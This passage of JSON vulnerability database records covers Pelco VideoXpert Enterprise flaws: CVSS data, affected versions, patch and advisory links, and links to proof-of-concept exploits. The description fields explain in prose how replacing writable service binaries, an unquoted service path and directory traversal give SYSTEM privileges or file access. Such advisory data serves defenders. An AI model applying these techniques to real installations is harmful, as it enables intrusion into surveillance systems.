"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9964"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42312/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/38558"
},
{
"trust": 0.3,
"url": "https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp"
},
{
"trust": 0.3,
"url": "https://download.schneider-electric.com/files?p_endoctype=technical+leaflet\u0026amp;p_file_id=8621588310\u0026amp;p_file_name=sevd-2017-339-01-+pelco+videoxpert+enterprise.pdf\u0026amp;p_reference=sevd-2017-339-01"
},
{
"trust": 0.3,
"url": "http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html"
},
{
"trust": 0.3,
"url": "https://www.cybersecurity-help.cz/vdb/sb2017122204"
},
{
"trust": 0.3,
"url": "http://www.isssource.com/schneider-clears-pelco-vulnerabilities/"
},
{
"trust": 0.3,
"url": "http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system"
},
{
"trust": 0.3,
"url": "http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5419.php"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070079"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143318"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129664"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9964"
},
{
"trust": 0.1,
"url": "https://www.auscert.org.au/bulletins/56446"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42311/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070077"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143317"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129663"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9965"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9965"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42310/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143316"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070078"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129662"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9966"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9966"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"date": "2017-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"date": "2018-01-02T03:29:00.267000",
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"date": "2018-01-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"date": "2024-11-21T03:37:15.877000",
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Pelco VideoXpert Enterprise Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
}
],
"trust": 0.6
}
}
VAR-201801-1068
Vulnerability from variot - Updated: 2024-11-23 21:39A privilege escalation vulnerability exists in Schneider Electric's Pelco VideoXpert Enterprise versions 2.0 and prior. By replacing certain files, an unauthorized user can obtain system privileges and the inserted code would execute at an elevated privilege level. Schneider Electric Pelco VideoXpert Enterprise Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoVideoXpertEnterprise is an enterprise video management system. Schneider Electric Pelco VideoXpert Enterprise is prone to multiple directory traversal and an access-bypass vulnerabilities.
Exploiting these issues will allow an attacker to bypass security restrictions, execute arbitrary code and perform unauthorized actions. Information harvested may aid in launching further attacks. VideoXpert is a video management solution designed forscalability, fitting the needs surveillance operations of any size.VideoXpert Ultimate can also aggregate other VideoXpert systems,tying multiple video management systems into a single interface.The application is vulnerable to an elevation of privilegesvulnerability which can be used by a simple user that can changethe executable file with a binary of choice. The vulnerability existdue to the improper permissions, with the 'F' flag (full) for the'Users' group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.
VideoXpert services also suffer from an unquoted search path issueimpacting the 'VideoXpert Core' and 'VideoXpert Exports' servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user’s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1068",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert",
"scope": "eq",
"trust": 0.8,
"vendor": "schneider electric",
"version": "enterprise 2.1"
},
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 0.8,
"vendor": "schneider electric",
"version": "all versions"
},
{
"model": "electric pelco videoxpert enterprise",
"scope": "lt",
"trust": 0.6,
"vendor": "schneider",
"version": "2.1"
},
{
"model": "pelco videoxpert enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.0"
},
{
"model": "pelco videoxpert enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "2.0.41"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.14.7"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "core software 1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "media gateway software 1.12.26"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "exports 1.12"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:schneider_electric:pelco_videoxpert",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gjoko Krstic",
"sources": [
{
"db": "BID",
"id": "102338"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9966",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2017-9966",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2017-38303",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2017-9966",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-9966",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-9966",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-38303",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201706-1082",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A privilege escalation vulnerability exists in Schneider Electric\u0027s Pelco VideoXpert Enterprise versions 2.0 and prior. By replacing certain files, an unauthorized user can obtain system privileges and the inserted code would execute at an elevated privilege level. Schneider Electric Pelco VideoXpert Enterprise Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoVideoXpertEnterprise is an enterprise video management system. Schneider Electric Pelco VideoXpert Enterprise is prone to multiple directory traversal and an access-bypass vulnerabilities. \nExploiting these issues will allow an attacker to bypass security restrictions, execute arbitrary code and perform unauthorized actions. Information harvested may aid in launching further attacks. VideoXpert is a video management solution designed forscalability, fitting the needs surveillance operations of any size.VideoXpert Ultimate can also aggregate other VideoXpert systems,tying multiple video management systems into a single interface.The application is vulnerable to an elevation of privilegesvulnerability which can be used by a simple user that can changethe executable file with a binary of choice. The vulnerability existdue to the improper permissions, with the \u0027F\u0027 flag (full) for the\u0027Users\u0027 group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.\u003cbr/\u003e\u003cbr/\u003eVideoXpert services also suffer from an unquoted search path issueimpacting the \u0027VideoXpert Core\u0027 and \u0027VideoXpert Exports\u0027 servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user\u2019s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9966"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_fd.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_eop.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ICS CERT",
"id": "ICSA-17-355-02",
"trust": 3.5
},
{
"db": "NVD",
"id": "CVE-2017-9966",
"trust": 3.4
},
{
"db": "BID",
"id": "102338",
"trust": 2.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2017-339-01",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-38303",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2017122204",
"trust": 0.2
},
{
"db": "CXSECURITY",
"id": "WLB-2017070077",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2017-9965",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143317",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42311",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070078",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143316",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42310",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"id": "VAR-201801-1068",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38303"
}
],
"trust": 1.3708333499999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38303"
}
]
},
"last_update_date": "2024-11-23T21:39:52.860000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "VideoXpert Enterprise Video Management System",
"trust": 0.8,
"url": "https://www.pelco.com/video-management-system/videoxpert"
},
{
"title": "SchneiderElectricPelcoVideoXpertEnterprise privilege escalation vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/111985"
},
{
"title": "Schneider Electric Pelco VideoXpert Enterprise Fixes for access control error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=99879"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.5,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-355-02"
},
{
"trust": 1.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2017-339-01/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/102338"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9966"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9966"
},
{
"trust": 0.3,
"url": "http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true"
},
{
"trust": 0.2,
"url": "https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp"
},
{
"trust": 0.2,
"url": "https://download.schneider-electric.com/files?p_endoctype=technical+leaflet\u0026amp;p_file_id=8621588310\u0026amp;p_file_name=sevd-2017-339-01-+pelco+videoxpert+enterprise.pdf\u0026amp;p_reference=sevd-2017-339-01"
},
{
"trust": 0.2,
"url": "http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html"
},
{
"trust": 0.2,
"url": "https://www.cybersecurity-help.cz/vdb/sb2017122204"
},
{
"trust": 0.2,
"url": "http://www.isssource.com/schneider-clears-pelco-vulnerabilities/"
},
{
"trust": 0.2,
"url": "http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42311/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070077"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143317"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129663"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9965"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9965"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42310/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143316"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070078"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129662"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9966"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"date": "2017-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"date": "2018-01-02T03:29:00.330000",
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38303"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011853"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1082"
},
{
"date": "2024-11-21T03:37:16.120000",
"db": "NVD",
"id": "CVE-2017-9966"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Pelco VideoXpert Enterprise Access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011853"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1082"
}
],
"trust": 0.6
}
}
VAR-201801-1067
Vulnerability from variot - Updated: 2024-11-23 21:39An exposure of sensitive information vulnerability exists in Schneider Electric's Pelco VideoXpert Enterprise versions 2.0 and prior. Using a directory traversal attack, an unauthorized person can view web server files. Schneider Electric Pelco VideoXpert Enterprise Contains a path traversal vulnerability.Information may be obtained. PelcoVideoXpertEnterprise is an enterprise video management system.
